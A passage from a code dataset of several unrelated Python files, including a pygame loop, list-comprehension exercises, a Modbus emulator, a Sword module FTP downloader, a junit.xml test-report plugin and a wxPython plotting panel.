None:\n self.player.loc = {'x': 100, 'y': 100}\n else:\n self.player.loc = {'x': player_loc['x'], 'y': player_loc['y']}\n def check_collisions(self, obj):\n for item in self.current_level.game_assets:\n\n # Optimisation don't figure out collisions for object that's nowhere near\n if not (max(item.loc['x'],obj.loc['x']) - min(item.loc['x'],obj.loc['x'])) \\\n > self.screen_width/2:\n\n if item.check_collision(obj):\n obj.has_been_hit(item)\n return True\n\n return False\n\n def get_worlds_list(self):\n return game_worlds\n\n\nif __name__ == '__main__':\n # Main game loop\n pygame.init()\n\n size = (w, h)\n from pygame.locals import *\n flags = DOUBLEBUF\n\n screen = pygame.display.set_mode(size, flags)\n\n Quit = False\n GAME = Game()\n\n while Quit is not True:\n GAME.update_assets()\n GAME.draw_assets()\n\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n key = event.key\n if event.key == pygame.K_ESCAPE or event.key == pygame.K_q:\n Quit = True\n","repo_name":"filtoid/ld30","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14764558561","text":"if __name__ == \"__main__\":\n #First example in exercises\n li = [3, 6, 2, 7]\n li = [elem*2 for elem in li if (elem % 2 == 0)]\n print(li)\n #Second example in exercises\n list_ex1 = [('a', 1), ('b', 2), ('c', 7)]\n lc_list_ex1 = [ n*3 for (x, n) in li]\n print(lc_list_ex1)\n #My example\n li1 = [3, 2, 4, 1]\n li2 = [elem * 2 for elem in [item + 1 for item in li1]]\n print(li2)\n #Another my example\n list_of_lists = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n print(list_of_lists)\n for list in list_of_lists:\n print(list)\n for x in list:\n print(x)\n #Third example in exercises\n def subtract(a, b):\n return a - b\n oplist = [(6, 3), (1, 7), (5, 5)]\n result = [subtract(b, a) for (a, b) in oplist]\n print(result)\n #Nested List Compreshension\n list_nested = [3, 2, 4, 1]\n list_nested_res = [elem*2 for elem in\n [item+1 for item in list_nested]]\n print(list_nested_res)\n #Example for creating matrix with List Comprehension\n list_1_10 = [i for i in range(10)]\n list_example_matrix = [[j+1 for j in range(3*i, 3*i+3)] for i in range(3)]\n\n n = 5\n matrix = [[0 for j in range(n)] for i in range(n)]\n print(list_1_10)\n print(list_example_matrix)\n print(matrix)","repo_name":"StefBelcev/PythonCourse","sub_path":"exercises/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73948241444","text":"#!/usr/bin/env python3\n'''\nModbus Server эмулятор устройств отдающих данные по протоколу модбас\nреализовано:\n +\nданные по адресному пространству: scada_config.MBServerAdrMap\nалгоритм в STATES {'N/A':{'result':(A,B),'length':(C,D)}...\n { состояние:{значение_датчика:int random в диапазоне A,B, длительность_отрезка:int random в диапазоне C,D}}\nобновление данных UPDATE_PERIOD секунд\n'''\nimport asyncio\nimport sys\nfrom random import randint\n\nif sys.platform == 'win32':\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy()) #Если запускаем из под win \n\nimport importlib\n\nimport globals\nfrom classes.channels import Node\n\nscada_config=importlib.import_module('projects.'+globals.PROJECT['path']+'.scadaconfig')\nfrom exchangeserver import ModbusExchangeServer\n\nSTATES={ 'N/A':{'result':(None,None),'length':(20,200)},\n 'Off':{'result':(0,0),'length':(5,20)},\n 'Stand':{'result':(10,20),'length':(5,50)},\n 'Work':{'result':(70,90),'length':(20,100)}\n }\nUPDATE_PERIOD:float= 1 #update period in seconds\n\nclass Source():\n def __init__(self,id,addr,regCount,format,function) -> None:\n self.id=id\n self.addr =addr\n self.regCount =regCount\n self.format =format\n self.function =function\n def __str__(self) -> str:\n return self.id\n\nclass NodeEmulator(Node):\n state:int = None\n length:int = None\n counter:int = 0\n\n def __str__(self):\n return super().__str__() + f'state:{self.state} len:{self.length}'\n\ndef nodesInit(configSources, configNodes):\n sources=[Source(source['id'],\n # ip=source['ip'],\n source['address'],\n source['regCount'],\n source['format'],\n # port=source['port'],\n source['function']\n ) for source in configSources]\n\n nodes=[NodeEmulator(id=node['id'],moduleId=node['moduleId'],type=node['type'],sourceIndexList=node['sourceIndexList']) for node in configNodes]\n for node in nodes:\n node.state=list(STATES.keys())[randint(1,3)]\n node.length=randint(STATES.get(node.state)['length'][0], STATES.get(node.state)['length'][1])\n try:\n node.source=next(filter(lambda source:source.id==node.sourceId, sources))\n except StopIteration:\n node.source=None\n # print(node)\n return nodes\n\ndef MBServerInit(MBServerParams, MBServerAdrMap):\n print('Address mapping:')\n for unit in MBServerAdrMap:\n print (f'Unit:{unit.get(\"unit\")}')\n for name, regs in unit.get('map').items():\n print(f' {name}')\n for reg in regs:\n print(f' id:{reg.get(\"id\")}, address:{reg.get(\"addr\")}, type:{reg.get(\"type\")}')\n return ModbusExchangeServer(MBServerAdrMap, MBServerParams['host'], MBServerParams['port'])\n\nasync def aSleep(pause):\n await asyncio.sleep(pause)\n\ndef mainLoop(nodes, MBServer): \n print ('loop start')\n MBServer.start()\n try:\n while True:\n for node in nodes:\n node.result=randint(STATES.get(node.state)['result'][0], STATES.get(node.state)['result'][1])\n node.counter+=1\n if node.counter>= node.length:\n node.counter=0\n newStateIndex=randint(1,3)\n while abs(newStateIndex-list(STATES.keys()).index(node.state))>1:\n newStateIndex=randint(1,3)\n node.state=list(STATES.keys())[newStateIndex]\n node.length=randint(STATES.get(node.state)['length'][0], STATES.get(node.state)['length'][1])\n MBServer.setValue(node.id, node.result)\n asyncio.run(aSleep(UPDATE_PERIOD))\n except KeyboardInterrupt:\n print ('server stoping...')\n MBServer.stop()\n print ('server stops')\n return\n\ndef main():\n print ('*'*40)\n print ('*'+' '*38+'*')\n print ('*'+' '*12+''+'Modbus EMULATOR'+' '*11+'*')\n print ('*'+' '*38+'*')\n print ('*'*40)\n print (f\"ip:{globals.MBServerParams_E['host']}, port:{globals.MBServerParams_E['port']}\")\n\n nodes = nodesInit(scada_config.ModuleList, scada_config.channelsConfig.get('nodes'))\n MBServer = MBServerInit(globals.MBServerParams_E,scada_config.MBServerAdrMap)\n mainLoop(nodes, MBServer)\n\nif __name__=='__main__':\n main()","repo_name":"IgorVDubov/gather_old","sub_path":"mb_emulator.py","file_name":"mb_emulator.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43612624188","text":"\"\"\"Schema constants.\"\"\"\r\n# Schema fields\r\nSCHEMA_DTYPE = \"dtype\"\r\nSCHEMA_REQUIRED = \"required\"\r\nSCHEMA_DEFAULT = \"default\"\r\n\r\n# Data Types\r\nDTYPE_STRING = \"string\"\r\nDTYPE_INT = \"int\"\r\nDTYPE_FLOAT = \"float\"\r\nDTYPE_BOOL = \"bool\"\r\nDTYPE_LIST = \"list\"\r\nDTYPE_DICT = \"dict\"\r\nDTYPE_SET = \"set\"\r\nDTYPE_TUPLE = \"tuple\"\r\nDTYPE_URL = \"url\"\r\nDTYPE_IP = \"ip\"\r\n","repo_name":"gauri-sacumen/Connector_First_Repo","sub_path":"venv/lib/python3.10/site-packages/sac_configurations/constants/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43736415296","text":"\n#This is the file from which the watermark is to be retrieved\n\nimport sys\n#control variable\nmu = int(sys.argv[1])\ni1 = 1\ni2 = 2\nx1 = 30\nx2 = 25\n#watermark\ny1 = int(sys.argv[2])\ny2 = int(sys.argv[2])\n\nwhile y1 > 1:\n if y1 % 2 == 1:\n y1 = y1 * 3 + 1\n else:\n y1 = y1 / 2\nif x1 + y1 < 32 and x1 - y1 > 28:\n print('we are inside watermarked block1')\n\nwhile y2 > 1:\n if y2 % 2 == 1:\n y2 = y2 * 3 + 1\n else:\n y2 = y2 / 2\nif x1 + y2 < 29 and x1 - y2 > 25:\n print('We are inside watermarked block2')\n\n#Fluff Code\nx = 14\nwhile x > 2:\n if x % 2 == 0:\n x += 1\n else:\n x -= 5\ny = 43\nwhile y > 2:\n if y % 2 == 0:\n y += 1\n else:\n y -= 5\nz = 37\nwhile z > 2:\n if z % 2 == 0:\n z += 1\n else:\n z -= 5\n","repo_name":"vivekingithub/Xmark-Python","sub_path":"RedInput.py","file_name":"RedInput.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72996177446","text":"import os\nimport shutil\nfrom urllib import request\nimport tarfile\nimport configparser\nfrom ftplib import FTP\n\nclass RepoManager:\n local_path = \"~/.sword\"\n default_repo_server = \"ftp.crosswire.org\"\n default_repo = \"/pub/sword/raw\"\n def __init__(self,local_path,default_repo,default_repo_server):\n self.default_repo = default_repo\n self.default_repo_server = default_repo_server\n self.local_path = local_path\n def prep_local_repo(self):\n try:\n os.makedirs(os.path.join(self.local_path,\"mods.d\"))\n except:\n print(\"Directory exists\")\n self.grab_unpack_mod_confs(self.default_repo_server, self.default_repo)\n def grab_unpack_mod_confs(self,repo_server,repo):\n repo_path = os.path.join(self.local_path,\"Repositories\",repo_server,*repo.split('/'))\n print(repo_path)\n os.makedirs(repo_path)\n tarfile.open(self.pull_repo_mods_tar(repo_server,repo)).extractall(repo_path)\n #tar gunzip bra\n def pull_repo_mods_tar(self,repo_server,repo):\n return self.pull_ftp_tar(\"ftp://{}{}/{}\".format(repo_server, repo,\"mods.d.tar.gz\"))\n def pull_ftp_tar(self,uri):\n destination = os.path.join(self.local_path,\"mods.d.tar.gz\")\n print(uri)\n request.urlretrieve(uri, destination)\n return destination\n def grab_mod(self, repo_server, repo, modulename):\n path = os.path.join(self.local_path,'mods.d',modulename+'.conf')\n source_path = os.path.join(self.local_path,\"Repositories\",repo_server,*repo.split('/'),'mods.d',modulename+'.conf')\n module_info = configparser.ConfigParser()\n print(source_path)\n module_info.read(source_path)\n print(module_info)\n module_path = module_info[modulename.upper()]['DataPath']\n \n down_path = os.path.join(self.local_path, module_path)\n os.makedirs(down_path)\n \n url = self.default_repo+'/'+module_path\n \n ftp = FTP(self.default_repo_server)\n ftp.login()\n ftp.cwd(\".\"+url)\n \n files = ftp.nlst()\n\n for file in files:\n request.urlretrieve(\"ftp://{}{}/{}\".format(self.default_repo_server,url,file),os.path.join(down_path,file))\n shutil.copyfile(source_path,path)\n return 0\n\n\nrepo = RepoManager(\"/Users/david/temporary/.sword\",\"/pub/sword/raw\",\"ftp.crosswire.org\")\nrepo.prep_local_repo()\nrepo.grab_mod(\"ftp.crosswire.org\",\"/pub/sword/raw\",'drc')","repo_name":"davidmon21/heathen","sub_path":"repomanager.py","file_name":"repomanager.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39394583143","text":"import argparse\nfrom string import Template\n\nfrom junitparser import Error\nfrom junitparser import Failure\nfrom junitparser import JUnitXml\nfrom junitparser import Skipped\nfrom tcms_api import plugin_helpers\n\nfrom .version import __version__\n\n\nDEFAULT_TEMPLATE = \"${classname}.${name}\"\n\n\nclass Backend(plugin_helpers.Backend):\n name = \"kiwitcms-junit.xml-plugin\"\n version = __version__\n\n\nclass Plugin: # pylint: disable=too-few-public-methods\n def __init__(self, verbose=False, summary_template=DEFAULT_TEMPLATE):\n self.backend = Backend(prefix=\"[junit.xml]\", verbose=verbose)\n self.verbose = verbose\n # NB: template is defaulted both here and in the argument parser below\n self.summary_template = summary_template\n\n def testcase_summary(self, xml_case):\n \"\"\"\n This method will generate the TestCase summary which is sent to\n Kiwi TCMS. It may be overriden for more flexibility!\n \"\"\"\n values = {\n \"classname\": xml_case.classname,\n \"name\": xml_case.name,\n \"suitename\": getattr(xml_case, \"suitename\", None),\n }\n return Template(self.summary_template).substitute(values)\n\n def parse(\n self, junit_filenames, progress_cb=None\n ): # pylint: disable=too-many-branches, too-many-locals\n self.backend.configure()\n\n for junit_xml in junit_filenames:\n if self.verbose:\n print(f\"Parsing {junit_xml} ...\")\n\n xml = JUnitXml.fromfile(junit_xml)\n # apparently junit.xml may contain either a tag,\n # e.g. Katalon Studio\n if xml._tag == \"testsuites\": # pylint: disable=protected-access\n cases = []\n for suite in xml:\n for case in suite:\n # Retain the suite name (if present) with each\n # testcase.\n if suite.name:\n case.suitename = suite.name\n cases.append(case)\n # or directly (only 1) tag - nose & py.test\n else:\n cases = list(xml)\n\n for xml_case in cases:\n summary = self.testcase_summary(xml_case)[:255]\n\n test_case, _ = self.backend.test_case_get_or_create(summary)\n self.backend.add_test_case_to_plan(test_case[\"id\"], self.backend.plan_id)\n\n comment = self.backend.created_by_text\n if not xml_case.result:\n status_id = self.backend.get_status_id(\"PASSED\")\n\n # note: since junitpartser v2.0 the result attribute holds\n # a list of values b/c pytest can produce files which contain\n # multiple results for the same test case. We take the first!\n for result in xml_case.result:\n if isinstance(result, Failure):\n status_id = self.backend.get_status_id(\"FAILED\")\n comment = result.tostring()\n break\n\n if isinstance(result, Error):\n status_id = self.backend.get_status_id(\"ERROR\")\n comment = result.tostring()\n break\n\n if isinstance(result, Skipped):\n status_id = self.backend.get_status_id(\"WAIVED\")\n comment = result.message\n break\n\n for execution in self.backend.add_test_case_to_run(\n test_case[\"id\"],\n self.backend.run_id,\n ):\n self.backend.update_test_execution(execution[\"id\"], status_id, comment.decode())\n\n if progress_cb:\n progress_cb()\n\n self.backend.finish_test_run()\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(\n description=\"Parse the specified XML files and \" \"send the results to Kiwi TCMS\"\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n dest=\"verbose\",\n action=\"store_true\",\n help=\"Print information about created TP/TR records\",\n )\n # NB: template is defaulted both here and in the Plugin init method above\n parser.add_argument(\n \"--summary-template\",\n dest=\"summary_template\",\n type=str,\n help=\"Template summary from testcase, eg %(default)s.\",\n default=DEFAULT_TEMPLATE,\n )\n parser.add_argument(\"filename.xml\", type=str, nargs=\"+\", help=\"XML file(s) to parse\")\n\n args = parser.parse_args(argv[1:])\n\n plugin = Plugin(verbose=args.verbose, summary_template=args.summary_template)\n plugin.parse(getattr(args, \"filename.xml\"))\n","repo_name":"lasest/junit.xml-plugin","sub_path":"tcms_junit_plugin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"43447619674","text":"\nimport wx\nfrom math import log, isinf, isnan\nfrom hypotools import *\nfrom hypoparams import *\n\n\n\nclass GraphDisp():\n def __init__(self):\n self.numplots = 0\n self.currentplot = 0\n self.plots = []\n\n\n def GetFront(self):\n return self.plots[0]\n\n\n def Add(self, plot):\n self.plots.append(plot)\n\n\n # XYSynch() - Synchronise X and Y axes for all plots\n def XYSynch(self, plotzero=None): \n if plotzero == None: plotzero = self.plots[0]\n \n for plot in self.plots:\n plot.yfrom = plotzero.yfrom\n plot.yto = plotzero.yto\n plot.xfrom = plotzero.xfrom\n plot.xto = plotzero.xto\n\n\n\nclass GraphPanel(wx.Panel):\n def __init__(self, parent, index, size):\n wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, size)\n self.numdisps = 0\n self.frontdisp = 0\n self.dispset = []\n self.ostype = GetSystem()\n self.gsynch = 0\n self.scalebox = None\n self.subplot = 0\n self.settag = \"\"\n self.mainwin = parent\n self.index = index\n\n # Plot Mouse Control\n self.anchorpos = wx.Point(0, 0)\n self.overlay = wx.Overlay()\n\n # Draw Parameters\n self.xbase = 40\n self.ybase = 10\n self.xplot = 500\n self.yplot = 200\n self.xstretch = parent.xstretch\n self.colourpen = parent.colourpen\n self.SetBackgroundColour(wx.WHITE)\n\n # Plot Menu Coding\n self.menuIdPlotMap = {}\n self.menuIdSetMap = {}\n\n if self.ostype == 'Mac':\n self.textfont = wx.Font(wx.FontInfo(10).FaceName(\"Tahoma\"))\n self.smallfont = wx.Font(wx.FontInfo(8).FaceName(\"Tahoma\"))\n else:\n self.textfont = wx.Font(wx.FontInfo(8).FaceName(\"Tahoma\"))\n self.smallfont = wx.Font(wx.FontInfo(6).FaceName(\"Tahoma\"))\n\n self.scrollbar = wx.ScrollBar(self, wx.ID_ANY, wx.Point(self.xbase, self.yplot + 35), wx.Size(self.xplot + 50, -1))\n self.scrollbar.SetScrollbar(0, 40, self.xplot + 40, 50)\n\n self.Bind(wx.EVT_PAINT, self.OnPaint)\n self.Bind(wx.EVT_SCROLL, self.OnScroll)\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase)\n\n self.Bind(wx.EVT_RIGHT_DOWN, self.OnRightClick)\n self.Bind(wx.EVT_MENU, self.OnGraphRemove, ID_GraphRemove)\n self.Bind(wx.EVT_MENU, self.OnPlotCon, ID_PlotPanel)\n self.Bind(wx.EVT_MENU, self.OnGridOutput, ID_Output)\n\n\n self.Bind(wx.EVT_MOTION, self.OnMouseMove)\n self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)\n self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)\n\n\n def OnGridOutput(self, event):\n self.mainwin.mod.GridOutput()\n\n\n def OnPlotCon(self, event):\n if not self.mainwin.plotcon: \n self.mainwin.plotcon = PlotCon(self, \"Plot Control\")\n self.mainwin.toolset.AddBox(self.mainwin.plotcon) \n\n else: self.mainwin.plotcon.SetGraph(self)\n self.mainwin.plotcon.Show(True)\n\n\n def OnLeftUp(self, event):\n if self.mainwin.plotcon: self.mainwin.plotcon.SetGraph(self)\n\n\n def OnLeftDown(self, event):\n pos = event.GetPosition()\n mousedown = pos\n\n #if(mainwin->neurobox) mainwin->neurobox->SetGraph(this);\n\n plot = self.GetFrontPlot()\n xdiff = plot.xto - plot.xfrom\n xscale = xdiff / self.xplot\n xgraph = (mousedown.x - self.xbase) * xscale + plot.xfrom\n\n ydiff = plot.yto - plot.yfrom\n yscale = ydiff / self.yplot\n ygraph = (self.yplot - mousedown.y + self.ybase) * yscale + plot.yfrom\n\n snum = f\"LDown X {pos.x} Y {pos.y} graph {xgraph} {ygraph}\"\n #if(mainwin->diagnostic) mainwin->SetStatusText(snum);\n\n #self.CaptureMouse()\n self.anchorpos = pos\n if self.anchorpos.x < self.xbase: self.anchorpos.x = self.xbase\n if self.anchorpos.x > self.xbase + self.xplot: self.anchorpos.x = self.xbase + self.xplot\n if self.anchorpos.y < self.ybase: self.currentpos.y = self.ybase\n if self.anchorpos.y > self.ybase + self.yplot: self.anchorpos.y = self.ybase + self.yplot\n\n\n def OnMouseMove(self, event):\n pos = event.GetPosition()\n\n if self.mainwin.hypoflags[\"xypos\"]:\n plot = self.GetFrontPlot()\n\n # 27/11/20 fixed scaling using adjusted axis unit scales, still need to fix for measure\n\n xdiff = plot.xto - plot.xfrom\n xscale = xdiff / self.xplot\n xgraph = (pos.x - self.xbase) * xscale + plot.xfrom\n xpos = xgraph * plot.xunitscale / plot.xunitdscale\n xdata = xgraph / plot.binsize\n if self.anchorpos.x < pos.x: xmeasure = (pos.x - self.anchorpos.x) * xscale\n else: xmeasure = (self.anchorpos.x - pos.x) * xscale\n xplaces = numplaces(xdiff * plot.xunitscale / plot.xunitdscale)\n\n ydiff = plot.yto - plot.yfrom\n yscale = ydiff / self.yplot\n ygraph = (self.yplot - pos.y + self.ybase) * yscale + plot.yfrom\n ypos = ygraph * plot.yunitscale / plot.yunitdscale\n if self.anchorpos.y < pos.y: ymeasure = (pos.y - self.anchorpos.y) * yscale\n else: ymeasure = (self.anchorpos.y - pos.y) * yscale\n yplaces = numplaces(ydiff * plot.yunitscale / plot.yunitdscale)\n\n #data = plot.GetData(xgraph) * plot.yunitscale / plot.yunitdscale\n\n \n #if self.mainwin.diagnostic: snum.Printf(\"Graph Position X %s Y %s Data %s\", \n # numstring(xpos, xplaces), numstring(ypos, yplaces), numstring(data, yplaces));\n snum = f\"Graph Position X {numstring(xpos, xplaces)} Y {numstring(ypos, yplaces)}\"\n self.mainwin.SetStatusText(snum)\n \n\n if not self.HasCapture(): return\n\n currentpos = pos\n if currentpos.y > self.ybase + self.yplot - 1: currentpos.y = int(self.ybase + self.yplot - 1)\n if currentpos.y < self.ybase + 1: currentpos.y = self.ybase + 1\n if currentpos.x > self.xbase + self.xplot - 1: currentpos.x = self.xbase + self.xplot - 1\n if currentpos.x < self.xbase + 1: currentpos.x = self.xbase + 1\n \n dc = wx.ClientDC(self)\n overlaydc = wx.DCOverlay(self.overlay, dc)\n overlaydc.Clear()\n\n ctx = wx.GraphicsContext.Create(dc)\n ctx.SetBrush(wx.Brush(wx.Colour(192,192,255,64)))\n newrect = wx.Rect(self.anchorpos, currentpos)\n ctx.DrawRectangle(newrect.x, newrect.y, newrect.width, newrect.height)\n \n\n def OnGraphRemove(self, event):\n self.Refresh()\n self.mainwin.RemoveGraph(self)\n\n\n def OnErase(self, event):\n pass\n\n\n def XYSynch(self):\n for graphdisp in self.dispset: \n graphdisp.XYSynch()\n\n\n def ScrollUpdate(self, xmax=0):\n plot = self.GetFrontPlot()\n if not plot: return\n if not np.any(plot.data):\n #mod->diagbox->Write(\"plot \" + plot.gname + \" no data\\n\")\n #return\n max = 1000\n #else: plot.xmax = len(plot.data) / plot.xscale\n else: plot.xmax = plot.data.xmax / plot.xscale\n if plot.xdata != None: \n if xmax: plot.xmax = xmax\n else: plot.xmax = len(plot.xdata)\n\n #plot.xmax = 5000\n\n xdiff = plot.xto - plot.xfrom\n plot.xrel = plot.xfrom - plot.scrollpos # relative adjustment for non-zero xfrom set from scale panel\n if plot.xrel < plot.xmin: plot.xrel = plot.xmin\n\n #scrollxto = int((plot.xmax - plot.xrel) * plot.binsize) - 1\n scrollxto = int((plot.xmax - plot.xrel) * plot.binsize)\n section = int(xdiff)\n if section > scrollxto:\n plot.scrollpos = 0\n\n self.scrollbar.SetScrollbar(plot.scrollpos, section, scrollxto, section)\n #DiagWrite(f\"scrollpos {plot.scrollpos} section {section} scrollxto {scrollxto} section {section}\\n\")\n\n #self.Refresh()\n #overlay.Reset()\n\n\n def OnScroll(self, event):\n xscrollpos = event.GetPosition()\n self.ScrollX(xscrollpos)\n\n\n def ScrollX(self, xpos):\n self.xscrollpos = xpos\n\n for graphdisp in self.dispset:\n plot = graphdisp.GetFront()\n xfrom = plot.xfrom\n xdiff = plot.xto - plot.xfrom\n plot.xfrom = xpos + plot.xrel\n plot.xto = xpos + xdiff + plot.xrel\n self.xf.SetNumValue(plot.xfrom, xdiff)\n self.xt.SetNumValue(plot.xto, xdiff)\n plot.scrollpos = xpos\n\n #text = \"scroll xpos {} xfrom {} xrel {}\".format(xpos, xfrom, plot.xrel)\n #pub.sendMessage(\"status_listener\", message=text)\n\n #if self.gsynch: pub.sendMessage(\"scroll_listener\", graphdisp.index, xpos)\n #else: self.Refresh()\n\n #pub.sendMessage(\"scroll_listener\", index=self.index, pos=xpos)\n self.scalebox.ScrollUpdate(self.index, xpos)\n\n\n def ReSize(self, newxplot, newyplot):\n self.xplot = newxplot\n self.yplot = newyplot\n\n self.scrollbar.SetSize(self.xplot, -1)\n self.scrollbar.Move(self.xbase, int(self.yplot + 35))\n \n #overlay.Reset()\n self.Refresh()\n\n\n def GetFrontPlot(self):\n return self.dispset[0].plots[0]\n\n\n def SetFrontPlot(self, plot):\n self.dispset[0].plots[0] = plot\n\n \n def SetFront(self, graphdisp):\n if len(self.dispset) == 0: \n self.dispset.append(graphdisp)\n else:\n self.dispset[0] = graphdisp\n\n\n def OnRightClick(self, event):\n pos = event.GetPosition()\n menuPlot = wx.Menu()\n subPlot = None\n mod = self.mainwin.mod\n\n if not basicmode:\n if studentmode:\n menuPlot.Append(ID_GraphEPS, \"Export EPS\")\n menuPlot.Append(ID_PlotPanel, \"Plot Panel\")\n menuPlot.Append(ID_UnZoom, \"Zoom Undo\")\n menuPlot.Append(ID_GraphRemove, \"Delete Graph\")\n menuPlot.Append(ID_Output, \"Grid Output\")\n menuPlot.AppendSeparator()\n else:\n #menuPlot->Append(ID_GraphRemove, \"Delete Graph\")\n menuPlot.Append(ID_GraphEPS, \"Export EPS\")\n menuPlot.Append(ID_MultiEPS, \"Multi EPS\")\n menuPlot.Append(ID_MultiCell, \"Multi Cell\")\n menuPlot.Append(ID_Scale, \"Plot Panel\")\n menuPlot.Append(ID_UnZoom, \"Zoom Undo\")\n #menuPlot->Append(ID_Test, \"Test\")\n menuPlot.Append(ID_Output, \"Grid Output\")\n menuPlot.AppendSeparator()\n \n for settag in mod.plotbase.setstore:\n plotset = mod.plotbase.setstore[settag]\n if not plotset.submenu:\n menuitem = wx.MenuItem(menuPlot, wx.ID_ANY, settag, \"\", wx.ITEM_CHECK)\n#ifndef OSX\n #menuitem->SetBitmaps(radio_on, radio_off)\n#endif\n menuPlot.Append(menuitem)\n menuitem.Check(False)\n self.menuIdSetMap[menuitem.GetId()] = settag\n self.Bind(wx.EVT_MENU, self.OnGraphSelectSet, menuitem)\n\n #menuPlot->AppendRadioItem(1000 + i, graphset->name)\n else:\n subPlot = wx.Menu()\n for plottag in plotset.plottags:\n menuitem = wx.MenuItem(subPlot, wx.ID_ANY, plottag, \"\", wx.ITEM_CHECK)\n#ifndef OSX\n #menuitem->SetBitmaps(radio_on, radio_off)\n#endif\n subPlot.Append(menuitem)\n menuitem.Check(False)\n self.menuIdPlotMap[menuitem.GetId()] = plottag\n self.Bind(wx.EVT_MENU, self.OnGraphSelectPlot, menuitem)\n\n #subPlot->AppendRadioItem(2000 + graphset->gindex[j], graphset->GetPlot(j)->gname)\n menuPlot.Append(wx.ID_ANY, settag, subPlot)\n #menuPlot->Check(ID_subplot, true)\n \n #Connect(1000, 1000 + mod->graphbase->numsets - 1, wxEVT_COMMAND_MENU_SELECTED, wxCommandEventHandler(GraphWindow3::OnGraphSelectSet))\n #Connect(2000, 2000 + mod->graphbase->numgraphs, wxEVT_COMMAND_MENU_SELECTED, wxCommandEventHandler(GraphWindow3::OnGraphSelectPlot))\n\n #menuPlot->Check(1000, false)\n\n #Signal current plot/set\n #graphset = mod->graphbase->GetSet(dispset[0]->sdex)\n #if(!graphset->submenu) menuPlot->Check(1000 + dispset[0]->sdex, true)\n #else if(subPlot) subPlot->Check(2000 + dispset[0]->gdex, true)\n #mainwin->diagbox->Write(text.Format(\"\\ngraph menu set %d\\n\", dispset[0]->sdex))\n\n self.PopupMenu(menuPlot, pos.x + 20, pos.y)\n\n\n def OnGraphSelectPlot(self, event):\n id = event.GetId()\n DiagWrite(f\"Graph Plot Select ID {id}\\n\")\n\n plotbase = self.mainwin.mod.plotbase\n plottag = self.menuIdPlotMap[id]\n self.SetFrontPlot(plotbase.GetPlot(plottag))\n\n self.settag = plotbase.GetPlot(plottag).settag\n plotset = plotbase.GetSet(self.settag)\n \n if plotset.submenu:\n plotset.subtag = plottag\n #plotset.subplot[graphindex] = gdex;\n #mod->gtags[graphindex] = graphset->subtag;\n\n #graph = (*mod->graphbase)[gdex];\n #mod->diagbox->Write(text.Format(\"OnGraph id %d set %d name %s plot %d name %s tag %s\\n\", id, graphset->sdex, graphset->name, gdex, plot.gname, mod->graphbase->GetTag(gdex)));\n #mod->diagbox->Write(graphset->Display());\n\n #mod->gcodes[graphindex] = mod->graphbase->GetSetTag(dispset[0]->sdex);\n #mod->diagbox->Write(text.Format(\"gcodes index %d settag %s\\n\", graphindex, mod->graphbase->GetSetTag(dispset[0]->sdex)));\n\n self.mainwin.scalebox.ScaleUpdate()\n\n\n def OnGraphSelectSet(self, event):\n id = event.GetId()\n DiagWrite(f\"Graph Set Select ID {id}\\n\")\n\n plotbase = self.mainwin.mod.plotbase\n\n self.settag = self.menuIdSetMap[id]\n plotset = plotbase.GetSet(self.settag)\n plottag = plotset.GetPlot(self.mainwin.scalebox.gflags)\n\n self.SetFrontPlot(plotbase.GetPlot(plottag))\n #self.settag = plotset.tag\n\n #graph = (*mod->graphbase)[gdex];\n #mod->diagbox->Write(text.Format(\"OnGraph id %d set %d name %s plot %d name %s\\n\", id, graphset->sdex, graphset->name, gdex, plot.gname));\n #mod->diagbox->Write(graphset->Display());\n\n #mod->gcodes[graphindex] = mod->graphbase->GetSetTag(id-1000);\n\n #mod->diagbox->Write(text.Format(\"gcodes index %d settag %s\\n\", graphindex, mod->graphbase->GetSetTag(id-1000)));\n\n self.mainwin.scalebox.ScaleUpdate()\n\n\n def PaintBackground(self, dc):\n backgroundColour = self.GetBackgroundColour()\n #if backgroundColour.Ok() == False: backgroundColour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DFACE)\n\n dc.SetBrush(wx.Brush(backgroundColour))\n dc.SetPen(wx.Pen(backgroundColour, 1))\n \n windowRect = wx.Rect(wx.Point(0, 0), self.GetClientSize())\n dc.DrawRectangle(windowRect)\n\n\n def OnPaint(self, event):\n\n #dc = wx.PaintDC(self)\n dc = wx.BufferedPaintDC(self)\n self.PaintBackground(dc)\n gc = wx.GraphicsContext.Create(dc)\n\n drawdiag = True\n\n xlabels = 10\n ylabels = 5\n xylab = 2\n xoffset = 1\n\n xlogbase = 2.71828182845904523536028747135266250 # 3\n ylogbase = 2.71828182845904523536028747135266250 # 10 # default values replaced by graph specific below\n\n xplot = self.xplot\n yplot = self.yplot\n xbase = self.xbase\n ybase = self.ybase\n\n for graphdisp in self.dispset:\n for plot in graphdisp.plots:\n # get plot index\n gplot = graphdisp.plots.index(plot)\n\n # temp test graph\n # plot = PlotDat()\n\n # Graph Parameters\n xfrom = plot.xfrom * plot.xscale\n xto = plot.xto * 